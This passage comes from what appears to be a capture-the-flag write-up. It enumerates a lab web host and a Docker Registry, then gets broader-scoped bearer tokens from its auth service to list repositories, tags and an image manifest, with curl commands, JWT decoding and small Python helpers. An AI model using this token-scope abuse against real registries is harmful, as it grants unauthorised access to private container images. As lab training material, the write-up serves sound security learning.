404 GET 7l 13w 178c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 13w 194c https://www.webhosting.htb/js => https://www.webhosting.htb/js/
301 GET 7l 13w 194c https://www.webhosting.htb/images => https://www.webhosting.htb/images/
301 GET 7l 13w 194c https://www.webhosting.htb/css => https://www.webhosting.htb/css/
200 GET 669l 1715w 23978c https://www.webhosting.htb/
301 GET 7l 13w 194c https://www.webhosting.htb/hosting => https://www.webhosting.htb/hosting/
302 GET 0l 0w 0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 39l 110w 1544c https://www.webhosting.htb/hosting/META-INF
404 GET 39l 110w 1544c https://www.webhosting.htb/hosting/WEB-INF
404 GET 39l 110w 1544c https://www.webhosting.htb/hosting/web-inf
[####################] - 1m 150000/150000 0s found:8 errors:0
[####################] - 1m 30000/30000 296/s https://www.webhosting.htb/
[####################] - 1m 30000/30000 300/s https://www.webhosting.htb/js/
[####################] - 1m 30000/30000 300/s https://www.webhosting.htb/images/
[####################] - 1m 30000/30000 300/s https://www.webhosting.htb/css/
[####################] - 1m 30000/30000 265/s https://www.webhosting.htb/hosting/
I’ll note the META-INF
and WEB-INF
directories. They both return 404, but a different 404 than the default that’s being filtered.
I run feroxbuster
in its default smart-filtering mode. I’ll also note that feroxbuster
adds another default filter after it starts in /hosting
.
Nothing else too interesting here.
The TLS certificate on port 5000 and 5001 is for *.webhosting.htb
as well as the DNS name webhosting.htb
:
Visiting https://10.10.11.223:5000
returns an empty page. nmap
said it was Docker Registry. The HackTricks page 5000 - Pentesting Docker Registry has this list to identify Docker Registry:
I’ll try /v2/
, but I get a 401 Unauthorized response:
HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8
Docker-Distribution-Api-Version: registry/2.0
Www-Authenticate: Bearer realm="https://webhosting.htb:5001/auth",service="Docker registry"
X-Content-Type-Options: nosniff
Date: Fri, 26 Jan 2024 21:55:14 GMT
Content-Length: 87
{
"errors": [{
"code": "UNAUTHORIZED",
"message": "authentication required",
"detail": null
}]
}
I’ll note the Www-Authenticate
header shows that https://webhosting.htb:5001/auth
is the authentication service for this service, and the service
name is “Docker registry” (case matters). Given that it’s using the domain webhosting.htb
(without “www”), I’ll start using that as well.
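The realm and service parameters can be pulled out of that header programmatically, which is handy once I start scripting the token requests (a quick sketch):

```python
import re

# The Www-Authenticate value from the 401 response above
header = 'Bearer realm="https://webhosting.htb:5001/auth",service="Docker registry"'

# Grab all key="value" pairs from the challenge
params = dict(re.findall(r'(\w+)="([^"]*)"', header))
print(params["realm"])    # auth endpoint to request tokens from
print(params["service"])  # value to pass as the service query parameter
```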
Visiting this page returns:
I can directory brute force to find /auth
, or look at the headers above. Either way, it returns two tokens:
Those are JWT tokens, and they are the same. If I decode the middle block (the first is the header and the last is the signature), I’ll get:
oxdf@hacky$ echo "eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiIiwiZXhwIjoxNzA2MzA3MTg0LCJuYmYiOjE3MDYzMDYyNzQsImlhdCI6MTcwNjMwNjI4NCwianRpIjoiMTI0MjY1MjUyMTU1MDA4MTM5OSIsImFjY2VzcyI6W119" | base64 -d | jq .
{
"iss": "Acme auth server",
"sub": "",
"aud": "",
"exp": 1706307184,
"nbf": 1706306274,
"iat": 1706306284,
"jti": "1242652521550081399",
"access": []
}
That lines up nicely with the Token Authentication Implementation article in the Docker Registry documentation.
To use the token, the page above says to send it in an Authorization: Bearer [token]
header. If I send that token, it still fails:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/' -H 'Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiIiwiZXhwIjoxNzA2MzA3MTg0LCJuYmYiOjE3MDYzMDYyNzQsImlhdCI6MTcwNjMwNjI4NCwianRpIjoiMTI0MjY1MjUyMTU1MDA4MTM5OSIsImFjY2VzcyI6W119.RlbOC_S7c6odwcMCSK83N6ZnznWm-8S7sm9pH-8yNPQfKedhbQtcgWuu72WPRQ4l11B1HwpalgqAZSFf5nepZXYgoqIanzRwi9rU4WgzXmDqMVBvD9-mXZGkC1f_203hJB7xIokDR8MkuJBNEbD4ICgcDbYOkHRmzedenrop7ZyLiEFm2xsG3amds8ioaMkobv1oI1mkl1ZvT93Mj2MzPcgaDG4zbg5z-a7ChgUQH4O5ZjxPeplkLeErezzWj-T-ELFreik_vws11eDToK7Fgla0_VLxi6ER_16H_gQLYiVw23R4cCQ4faIbGN0ebBm7LzLmYKdq45b7KSL2jPmzhw'
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":null}]}
That’s because the access list in that token is empty.
The token auth docs show requesting a token from the following URL:
/token?service=registry.docker.io&scope=repository:samalba/my-app:pull,push
That seems like a way to request different privileges. The 401 gave a URL of /auth
rather than /token
. The service
must be “Docker registry” as shown in the header above. For the scope
, this GitHub issue shows that registry:catalog:*
is a way to request the catalog. I’ll try that:
oxdf@hacky$ curl -k 'https://webhosting.htb:5001/auth?service=Docker+registry&scope=registry:catalog:*'
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiRG9ja2VyIHJlZ2lzdHJ5IiwiZXhwIjoxNzA2MzA4Nzg4LCJuYmYiOjE3MDYzMDc4NzgsImlhdCI6MTcwNjMwNzg4OCwianRpIjoiNzM5NDcwMTE1OTkxNDU0MjY4MiIsImFjY2VzcyI6W3sidHlwZSI6InJlZ2lzdHJ5IiwibmFtZSI6ImNhdGFsb2ciLCJhY3Rpb25zIjpbIioiXX1dfQ.S1ZMIuJOGo3NlXxei60L905NBBnIu70WQCGcA6EuFsiYrhGoeLWVOeLygatuniFavmnxM_-grVW3lb2NNhuVnY_eLjKQ-B57A6aNqA7tsr9RBAsFB5T3YVbHc4mNtg5OiGJWP4F-iveDpZGfAA3eWAN7oZ1m8_hogTHzkIqAZE3uM5DfFfCAICKd-DDf60vVJ1yExC50L5IxIARRSvIpRT9WI-FhrHSeP8MXBwEU5pEpd6hiPOUrHpA7VeD8idkg6eFNza6nMSZ4sZu9_Q9XqnVJQ6dB9zb4JkF39BPUxm8hA4PZXlAbV1lJT9kc35GfWO-uIrn0aiiv_3lPk0eCkw","token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiRG9ja2VyIHJlZ2lzdHJ5IiwiZXhwIjoxNzA2MzA4Nzg4LCJuYmYiOjE3MDYzMDc4NzgsImlhdCI6MTcwNjMwNzg4OCwianRpIjoiNzM5NDcwMTE1OTkxNDU0MjY4MiIsImFjY2VzcyI6W3sidHlwZSI6InJlZ2lzdHJ5IiwibmFtZSI6ImNhdGFsb2ciLCJhY3Rpb25zIjpbIioiXX1dfQ.S1ZMIuJOGo3NlXxei60L905NBBnIu70WQCGcA6EuFsiYrhGoeLWVOeLygatuniFavmnxM_-grVW3lb2NNhuVnY_eLjKQ-B57A6aNqA7tsr9RBAsFB5T3YVbHc4mNtg5OiGJWP4F-iveDpZGfAA3eWAN7oZ1m8_hogTHzkIqAZE3uM5DfFfCAICKd-DDf60vVJ1yExC50L5IxIARRSvIpRT9WI-FhrHSeP8MXBwEU5pEpd6hiPOUrHpA7VeD8idkg6eFNza6nMSZ4sZu9_Q9XqnVJQ6dB9zb4JkF39BPUxm8hA4PZXlAbV1lJT9kc35GfWO-uIrn0aiiv_3lPk0eCkw"}
oxdf@hacky$ echo "eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiRG9ja2VyIHJlZ2lzdHJ5IiwiZXhwIjoxNzA2MzA4Nzg4LCJuYmYiOjE3MDYzMDc4NzgsImlhdCI6MTcwNjMwNzg4OCwianRpIjoiNzM5NDcwMTE1OTkxNDU0MjY4MiIsImFjY2VzcyI6W3sidHlwZSI6InJlZ2lzdHJ5IiwibmFtZSI6ImNhdGFsb2ciLCJhY3Rpb25zIjpbIioiXX1dfQ" | base64 -d | jq .
base64: invalid input
{
"iss": "Acme auth server",
"sub": "",
"aud": "Docker registry",
"exp": 1706308788,
"nbf": 1706307878,
"iat": 1706307888,
"jti": "7394701159914542682",
"access": [
{
"type": "registry",
"name": "catalog",
"actions": [
"*"
]
}
]
}
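The “base64: invalid input” message is just base64 complaining about missing padding: JWT segments are base64url-encoded with the padding stripped, and this one isn’t a multiple of four characters long. It decodes enough anyway, but a small Python helper avoids the issue entirely (a sketch; the function name is mine):

```python
import base64
import json

def jwt_payload(token: str) -> dict:
    """Decode a JWT's middle (payload) segment without verifying the signature."""
    seg = token.split(".")[1]
    seg += "=" * (-len(seg) % 4)  # restore the padding base64url strips
    return json.loads(base64.urlsafe_b64decode(seg))
```

Calling jwt_payload(token)["access"] then shows the granted scopes directly.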
That token seems to have full permissions on the aud
(Audience) of “Docker registry”. It works to query:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/' -H 'Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiRG9ja2VyIHJlZ2lzdHJ5IiwiZXhwIjoxNzA2MzA4Nzg4LCJuYmYiOjE3MDYzMDc4NzgsImlhdCI6MTcwNjMwNzg4OCwianRpIjoiNzM5NDcwMTE1OTkxNDU0MjY4MiIsImFjY2VzcyI6W3sidHlwZSI6InJlZ2lzdHJ5IiwibmFtZSI6ImNhdGFsb2ciLCJhY3Rpb25zIjpbIioiXX1dfQ.S1ZMIuJOGo3NlXxei60L905NBBnIu70WQCGcA6EuFsiYrhGoeLWVOeLygatuniFavmnxM_-grVW3lb2NNhuVnY_eLjKQ-B57A6aNqA7tsr9RBAsFB5T3YVbHc4mNtg5OiGJWP4F-iveDpZGfAA3eWAN7oZ1m8_hogTHzkIqAZE3uM5DfFfCAICKd-DDf60vVJ1yExC50L5IxIARRSvIpRT9WI-FhrHSeP8MXBwEU5pEpd6hiPOUrHpA7VeD8idkg6eFNza6nMSZ4sZu9_Q9XqnVJQ6dB9zb4JkF39BPUxm8hA4PZXlAbV1lJT9kc35GfWO-uIrn0aiiv_3lPk0eCkw'
{}
I’ll use this bash
to save the token in an env variable:
oxdf@hacky$ TOKEN=$(curl -sk 'https://webhosting.htb:5001/auth?service=Docker+registry&scope=registry:catalog:*' | jq -r .token)
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/' -H "Authorization: Bearer $TOKEN"
{}
/v2/_catalog
will list the catalog:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/_catalog' -H "Authorization: Bearer $TOKEN"
{"repositories":["hosting-app"]}
There’s a repository named hosting-app
.
Just like I showed in Registry, I can request a tags list for the repo with /v2/[repo]/tags/list
. Unfortunately, it fails:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/hosting-app/tags/list' -H "Authorization: Bearer $TOKEN"
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"repository","Class":"","Name":"hosting-app","Action":"pull"}]}]}
It shows the action I’m trying to do as pull
. I’ll request that from the auth server:
oxdf@hacky$ TOKEN=$(curl -sk 'https://webhosting.htb:5001/auth?service=Docker+registry&scope=repository:hosting-app:pull' | jq -r .token)
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/hosting-app/tags/list' -H "Authorization: Bearer $TOKEN"
{"name":"hosting-app","tags":["latest"]}
There’s one tag, latest
.
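The whole dance (request a scoped token, then replay it against the registry) is easy to script. A minimal sketch using only the standard library (hostnames are from this box; the service string must be exactly “Docker registry”):

```python
import json
import ssl
import urllib.parse
import urllib.request

REGISTRY = "https://webhosting.htb:5000"
AUTH = "https://webhosting.htb:5001/auth"
CTX = ssl._create_unverified_context()  # self-signed cert, same as curl -k

def get_token(scope: str) -> str:
    # Ask the auth server for a bearer token with the requested scope
    qs = urllib.parse.urlencode({"service": "Docker registry", "scope": scope})
    with urllib.request.urlopen(f"{AUTH}?{qs}", context=CTX) as r:
        return json.load(r)["token"]

def registry_get(path: str, scope: str) -> dict:
    # Replay the token against the registry API
    req = urllib.request.Request(
        f"{REGISTRY}{path}",
        headers={"Authorization": f"Bearer {get_token(scope)}"},
    )
    with urllib.request.urlopen(req, context=CTX) as r:
        return json.load(r)

# e.g. registry_get("/v2/_catalog", "registry:catalog:*")
#      registry_get("/v2/hosting-app/tags/list", "repository:hosting-app:pull")
```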
The manifest contains all the layers for the image, which I can request using the /v2/[repository]/manifests/[tag]
endpoint:
oxdf@hacky$ curl -k 'https://webhosting.htb:5000/v2/hosting-app/manifests/latest' -H "Authorization: Bearer $TOKEN"
{
"schemaVersion": 1,
"name": "hosting-app",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:0bf45c325a696381eea5176baa1c8e84fbf0fe5e2ddf96a22422b10bf879d0ba"
},
{
"blobSum": "sha256:4a19a05f49c2d93e67d7c9ea8ba6c310d6b358e811c8ae37787f21b9ad82ac42"
},
{
"blobSum": "sha256:9e700b74cc5b6f81ed6513fa03c7b6ab11a71deb8e27604632f723f81aca3268"
},
{
"blobSum": "sha256:b5ac54f57d23fa33610cb14f7c21c71aa810e58884090cead5e3119774a202dc"
},
{
"blobSum": "sha256:396c4a40448860471ae66f68c261b9a0ed277822b197730ba89cb50528f042c7"
},
{
"blobSum": "sha256:9d5bcc17fed815c4060b373b2a8595687502925829359dc244dd4cdff777a96c"
},
{
"blobSum": "sha256:ab55eca3206e27506f679b41b39ba0e4c98996fa347326b6629dae9163b4c0ec"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:f7b708f947c32709ecceaffd85287d5eb9916a3013f49c8416228ef22c2bf85e"
},
{
"blobSum": "sha256:497760bf469e19f1845b7f1da9cfe7e053beb57d4908fb2dff2a01a9f82211f9"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:e4cc5f625cda9caa32eddae6ac29b170c8dc1102988b845d7ab637938f2f6f84"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:0da484dfb0612bb168b7258b27e745d0febf56d22b8f10f459ed0d1dfe345110"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:7b43ca85cb2c7ccc62e03067862d35091ee30ce83e7fed9e135b1ef1c6e2e71b"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:fa7536dd895ade2421a9a0fcf6e16485323f9e2e45e917b1ff18b0f648974626"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:5de5f69f42d765af6ffb6753242b18dd4a33602ad7d76df52064833e5c527cb4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:ff3a5c916c92643ff77519ffa742d3ec61b7f591b6b7504599d95a4a41134e28"
}
],
"history": [
{
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"app\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/tomcat/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin\",\"LANG=C.UTF-8\",\"JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre\",\"JAVA_VERSION=8u151\",\"JAVA_ALPINE_VERSION=8.151.12-r0\",\"CATALINA_HOME=/usr/local/tomcat\",\"TOMCAT_NATIVE_LIBDIR=/usr/local/tomcat/native-jni-lib\",\"LD_LIBRARY_PATH=/usr/local/tomcat/native-jni-lib\",\"GPG_KEYS=05AB33110949707C93A279E3D3EFE6B686867BA6 07E48665A34DCAFAE522E5E6266191C37C037D42 47309207D818FFD8DCD3F83F1931D684307A10A5 541FBE7D8F78B25E055DDEE13C370389288584E7 61B832AC2F1C5A90F0F9B00A1C506407564C17A3 79F7026C690BAA50B92CD8B66A3AD3F4F22C4FED 9BA44C2621385CB966EBA586F72C284D731FABEE A27677289986DB50844682F8ACB77FC2E86E29AC A9C5DF4D22E99998D9875A5110C01C5A2F6059E7 DCFD35E0BF8CA7344752DE8B6FB21E8933C60243 F3A04C595DB5B6A5F1ECA43E3B7BBB100D811BBE F7DA48BB64BCB84ECBA7EE6935CD23C10D498E23\",\"TOMCAT_MAJOR=9\",\"TOMCAT_VERSION=9.0.2\",\"TOMCAT_SHA1=b59e1d658a4edbca7a81d12fd6f20203a4da9743\",\"TOMCAT_TGZ_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz\",\"TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc 
\\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc\"],\"Cmd\":[\"catalina.sh\",\"run\"],\"Image\":\"sha256:57f3a04ba3229928a30942945b0fb3c74bd61cec80cbc5a41d7d61a2d1c3ec4f\",\"Volumes\":null,\"WorkingDir\":\"/usr/local/tomcat\",\"Entrypoint\":null,\"OnBuild\":[],\"Labels\":null},\"container\":\"2f8f037b0e059fa89bc318719f991b783cd3c4b92de4a6776cc5ec3a8530d6ba\",\"container_config\":{\"Hostname\":\"2f8f037b0e05\",\"Domainname\":\"\",\"User\":\"app\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/tomcat/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin\",\"LANG=C.UTF-8\",\"JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre\",\"JAVA_VERSION=8u151\",\"JAVA_ALPINE_VERSION=8.151.12-r0\",\"CATALINA_HOME=/usr/local/tomcat\",\"TOMCAT_NATIVE_LIBDIR=/usr/local/tomcat/native-jni-lib\",\"LD_LIBRARY_PATH=/usr/local/tomcat/native-jni-lib\",\"GPG_KEYS=05AB33110949707C93A279E3D3EFE6B686867BA6 07E48665A34DCAFAE522E5E6266191C37C037D42 47309207D818FFD8DCD3F83F1931D684307A10A5 541FBE7D8F78B25E055DDEE13C370389288584E7 61B832AC2F1C5A90F0F9B00A1C506407564C17A3 79F7026C690BAA50B92CD8B66A3AD3F4F22C4FED 9BA44C2621385CB966EBA586F72C284D731FABEE A27677289986DB50844682F8ACB77FC2E86E29AC A9C5DF4D22E99998D9875A5110C01C5A2F6059E7 DCFD35E0BF8CA7344752DE8B6FB21E8933C60243 F3A04C595DB5B6A5F1ECA43E3B7BBB100D811BBE F7DA48BB64BCB84ECBA7EE6935CD23C10D498E23\",\"TOMCAT_MAJOR=9\",\"TOMCAT_VERSION=9.0.2\",\"TOMCAT_SHA1=b59e1d658a4edbca7a81d12fd6f20203a4da9743\",\"TOMCAT_TGZ_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz 
\\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz\",\"TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download\\u0026filename=tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www-us.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://www.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc \\thttps://archive.apache.org/dist/tomcat/tomcat-9/v9.0.2/bin/apache-tomcat-9.0.2.tar.gz.asc\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) \",\"CMD [\\\"catalina.sh\\\" \\\"run\\\"]\"],\"Image\":\"sha256:57f3a04ba3229928a30942945b0fb3c74bd61cec80cbc5a41d7d61a2d1c3ec4f\",\"Volumes\":null,\"WorkingDir\":\"/usr/local/tomcat\",\"Entrypoint\":null,\"OnBuild\":[],\"Labels\":{}},\"created\":\"2023-07-04T10:57:03.768956926Z\",\"docker_version\":\"20.10.23\",\"id\":\"1f5797acb3ce332a92212fac43141b9179f396db844876ea976828c027cc5cd2\",\"os\":\"linux\",\"parent\":\"b581fd7323f8b829979a384105c27aeff6f114f0b5e63aaa00e4090ce50df370\",\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"b581fd7323f8b829979a384105c27aeff6f114f0b5e63aaa00e4090ce50df370\",\"parent\":\"1c287aa55678a4fa6681ba16d09ce6bf798fac6640dceb43230e18a04316aee1\",\"created\":\"2023-07-04T10:57:03.500684978Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) USER app\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"1c287aa55678a4fa6681ba16d09ce6bf798fac6640dceb43230e18a04316aee1\",\"parent\":\"c5b60d48ea6e9578b52142829c5a979f0429207c7ff107f556c73b2d00230ba2\",\"created\":\"2023-07-04T10:57:03.230181852Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) COPY --chown=app:appfile:24e216b758a41629b4357c4cd3aa1676635e7f68b432edff5124a8af4b95362f in /etc/hosting.ini \"]}}"
},
{
"v1Compatibility": "{\"id\":\"c5b60d48ea6e9578b52142829c5a979f0429207c7ff107f556c73b2d00230ba2\",\"parent\":\"8352728bd14b4f5a18051ae76ce15e3d3a97180d5a699b3847d89570e37354f1\",\"created\":\"2023-07-04T10:57:02.865658784Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c chown -R app /usr/local/tomcat/\"]}}"
},
{
"v1Compatibility": "{\"id\":\"8352728bd14b4f5a18051ae76ce15e3d3a97180d5a699b3847d89570e37354f1\",\"parent\":\"a785065e8f19dad061ddf5035668d11bc69cd943634130ffd35ab8fcd9884da0\",\"created\":\"2023-07-04T10:56:56.087876543Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c adduser -S -u 1000 -G app app\"]}}"
},
{
"v1Compatibility": "{\"id\":\"a785065e8f19dad061ddf5035668d11bc69cd943634130ffd35ab8fcd9884da0\",\"parent\":\"690545aba874c1cbffa3b6cfa0b6708cffb39c97d4b823b4cef4abd0db23cce0\",\"created\":\"2023-07-04T10:56:55.215778789Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c addgroup -S -g 1000 app\"]}}"
},
{
"v1Compatibility": "{\"id\":\"690545aba874c1cbffa3b6cfa0b6708cffb39c97d4b823b4cef4abd0db23cce0\",\"parent\":\"a133674c237f389cb7d5e0c12177d5a7f3dcc3f068f6e92561f5898835c827d6\",\"created\":\"2023-07-04T10:56:54.346382505Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) COPY file:c7945822095fe4c2530de4cf6bf7c729cbe6af014740a937187ab5d2e35c30f6 in /usr/local/tomcat/webapps/hosting.war \"]}}"
},
{
"v1Compatibility": "{\"id\":\"a133674c237f389cb7d5e0c12177d5a7f3dcc3f068f6e92561f5898835c827d6\",\"parent\":\"57f5a3c239ecc33903be4eabc571b72d8d934124b84dc6bdffb476845a9af610\",\"created\":\"2023-07-04T10:56:53.888849151Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) COPY file:9fd68c3bdf49b0400fb5ecb77c7ac57ae96f83db385b6231feb7649f7daa5c23 in /usr/local/tomcat/conf/context.xml \"]}}"
},
{
"v1Compatibility": "{\"id\":\"57f5a3c239ecc33903be4eabc571b72d8d934124b84dc6bdffb476845a9af610\",\"parent\":\"b01f09ef77c3df66690a924577eabb8ed7043baeaa37a1b608370d0489e4fdee\",\"created\":\"2023-07-04T10:56:53.629058758Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /usr/local/tomcat/webapps/ROOT\"]}}"
},
{
"v1Compatibility": "{\"id\":\"b01f09ef77c3df66690a924577eabb8ed7043baeaa37a1b608370d0489e4fdee\",\"parent\":\"80e769c3cd6d9be2bcfea77a058c23d7ea112afaddce9e12c8eebf6d759923fe\",\"created\":\"2018-01-10T09:34:07.981925046Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"catalina.sh\\\" \\\"run\\\"]\"]},\"throwaway\":true}"
},
{
"v1Compatibility": "{\"id\":\"80e769c3cd6d9be2bcfea77a058c23d7ea112afaddce9e12c8eebf6d759923fe\",\"parent\":\"f5f0aebde7367c572f72c6d19cbea5b9b039b281b5e140bcd1a9b30ebc4883ce\",\"created\":\"2018-01-10T09:34:07.723478629Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) EXPOSE 8080/tcp\"]},\"throwaway\":true}"
},
{
